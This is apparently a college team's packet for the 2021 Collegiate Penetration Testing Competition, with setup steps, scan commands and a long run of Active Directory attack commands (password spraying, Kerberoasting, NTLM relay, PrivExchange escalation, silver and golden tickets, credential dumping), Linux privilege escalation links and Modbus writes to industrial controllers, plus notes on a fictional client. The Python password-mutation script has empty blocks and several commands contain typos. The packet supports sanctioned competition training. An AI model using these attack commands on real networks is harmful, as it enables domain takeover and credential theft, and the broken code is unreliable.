
Collegiate Penetration Testing Competition materials

2021 Collegiate Penetration Testing Competition Packet

Google Drive Structure

  • <name>/ - misc notes
    • logs/ - from ~/logs
    • screenshots/
  • scans/ - files each with one scan output
  • lists/ - username and password lists

VDI Setup

Windows VDI

Recommended software to install:

Linux VDI

Use Bitvise from Windows VDI to SSH to Linux VDI. On first login, do this to enable logging:

mkdir ~/logs
echo "script -f ~/logs/\$(date +%s).log" | tee -a ~/.bash_profile ~/.zprofile

Relogin to SSH. Every time you login, you should see Script started.

Optional Windows AD tools:

git clone https://github.com/fox-it/mitm6.git
cd mitm6
sudo pip install .


Password List

Type into file old.txt:


Run this Python script (comments not needed):

# Read the original passwords
with open("old.txt", "r") as f:
	o = list(filter(None, f.read().split("\n")))

# Add years
for x in o[:]:
	if not x[0].isdigit():
		o.append(x + "21")
		o.append(x + "2021")
		o.append(x + "1")

# Add capitals
for x in o[:]:
	if x[0].islower():

# Add special characters
for x in o[:]:
	o.append(x + "!")
	o.append(x + "?")

# Write to file
with open("new.txt", "w") as f:

Add new.txt to lists/ in the Google Drive.


Host discovery scan so hosts can be assigned:

sudo nmap <ip_range> -sL

Initial scan (add to new Google Drive file in scans/):

sudo nmap <ip_range> -T5 -sS -n -F -oN scan_short.txt

Much longer scan (add to a new Google Drive file in scans/):

sudo nmap <ip_range> -T5 -sS -n -p- -A --version-all -oN scan_long.txt

Add -iL <filename> to take in target IPs via a file. Add these options for a slower scan if you get blocked:

-f --mtu 32 --ttl 64 -T1

Dump traffic (use Bitvise on Windows to retrieve the PCAP and open it in Wireshark):

ip a # find name of interface
tcpdump -i <interface> -s 65535 -w dump.pcap


Find pages:

dirb <url_base>

Scan for vulnerabilities:

nikto -h <ip> -p <port> # can also pass file with list of IPs

Windows AD

More resources at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md.

Initial access

SMB recon:

enum4linux -a <ip>

Anonymous SMB login:

smbclient -L //<ip>

Anonymous LDAP to get naming contexts:

ldapsearch -H ldap://<ip> -x -s base '' "(objectClass=*)" "*" +

Anonymous LDAP to get other stuff (naming contexts is comma separated list of dc=):

ldapsearch -H ldap://<ip> -x -b <naming_contexts>

Spray passwords on SMB (careful locking accounts):

crackmapexec smb <ip> -u <username_list> -p <password_list> --continue-on-success

Spray passwords on Kerberos (https://github.com/ropnop/kerbrute/tags) (careful locking accounts):

./kerbrute userenum -d <domain_name> <username_list>
./kerbrute passwordspray -d <domain_name> <username_list> <password>
./kerbrute bruteuser -d <domain_name> username <password_list>

ASREPRoast (can also be done via Rubeus on Windows):

crackmapexec ldap <ip> -u <username_list> -p '' --asreproast output.txt\
hashcat -m18200 output.txt <password_list>

May get NTLMv2 hash (used when server will make arbitrary HTTP request):

responder -I <interface> --wpad

More on responder here: https://book.hacktricks.xyz/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks

May get a shell (need mitm6):

mitm6 -i <interface> -d <domain_name>
impacket-ntlmrelayx -wh <your_ip> -t smb://<ip> -i # in new terminal


Kerberoasting (need domain account):

crackmapexec ldap <ip> -u <username> -p <password> --kerberoasting output.txt
hashcat -m13100 output.txt <password_list>

Same thing with impacket:

impacket-GetUserSPNs -request -dc-ip <ip> <domain_name>/<username>

Microsoft Exchange escalation:

wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/privexchange.py
impacket-ntlmrelayx -t ldap://<ip> --escalate-user <username>
python privexchange.py -ah <your_ip> <hostname>.<domain_name> -u <username> -d <domain_name> -p <password> # in new terminal
secretsdump.py <domain_name>/<username><hostname>.<domain_name> -just-dc # in new terminal

Resource-based constrained delegation (need mitm6):

mitm6 -i <interface> -d <domain_name>
impacket-ntlmrelayx -t ldaps://<hostname>.<domain_name> -wh <your_ip> --delegate-access # in new terminal
impacket-gtST -spn cifs/<hostname>.<domain_name>/<new_username>\$ -dc-ip <ip> -impersonate Administrator # in new terminal
export KRB5CCNAME=Administrator.ccache
impacket=secretsdump -k -no-pass <hostname>.<domain_name>

Add DNS records (need to clone https://github.com/dirkjanm/krbrelayx):

python3 dnstool.py -u '<domain>\<username>' -p <password> -a add -r <new_record> -d <your_ip> <target_ip>

Might dump a hash from the LDAP server which can be used for silver ticket (need to clone https://github.com/micahvandeusen/gMSADumper):

python3 gMSADumper.py -u <username> -p <password> -d <domain> -l <ip>

Pass the hash with impacket (lm_hash is optional):

impacket-getTGT <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Silver ticket with impacket:

impacket-ticketer -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

Golden ticket with impacket:

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

Use a ccache file to authenticate:

export KRB5CCNAME=<TGT_ccache_file>
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbclient <domain_name>/<user_name>@<remote_hostname> -k -no-pass

If you have a PowerShell, download this folder and follow the instructions in the README: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Download this and run it:

Collection of potentially useful Windows executables: https://lolbas-project.github.io/


Privilege Escalation

Download this and run it: https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh

List sudo rights:

sudo -l

Find set UID binaries:

find / -xdev -user root \( -perm -4000 -o -perm -2000 \)

Based on these results, look at GTFOBins: https://gtfobins.github.io/


Reverse shell cheat sheet: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

To see running processes without root, download the binary from here: https://github.com/DominicBreuker/pspy, then:

# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 


Good summary: https://github.com/nationalcptc-teamtools/University-of-Southern-California/blob/main/misc/scada.txt.


Sniff traffic via tcpdump or Wireshark to understand the traffic. Pentration testing framework: https://github.com/theralfbrown/smod-1. Metasploit has a client:

use auxiliary/scanner/scada/modbusclient
show actions
set action <action_name>
show options

PyModbus (pip install pymodbus) can be used to read and write to registers:

from pymodbus.client.sync import ModbusTcpClient
client = ModbusTcpClient("")
client.write_coil(1, True)
result = client.read_coils(1, 1)
# https://pymodbus.readthedocs.io/en/latest/source/library/pymodbus.client.html



  • Le Bonbon Croissant
    • Company receiving the test
    • Also sells candy
  • Le Bonbon Muffin
    • Rival company
    • Wilma Wonka claims is stealing recipes
    • Slug is founder and president
    • Coupon code: croissantsuck


  • Wilma Wonka
    • Founder and President
    • With company since 1971
  • Charlie Bucket
    • Chief Executive Officer
    • Born in 1957?
  • 'Granpa' Jim Joseph
    • Principle Security Engineer
  • Yael Corne
    • VP Risk and Compliance (DPO)
  • Mike Devry
    • Senior Security Engineer
  • Andrea Lefuvre
    • Customer Success Manager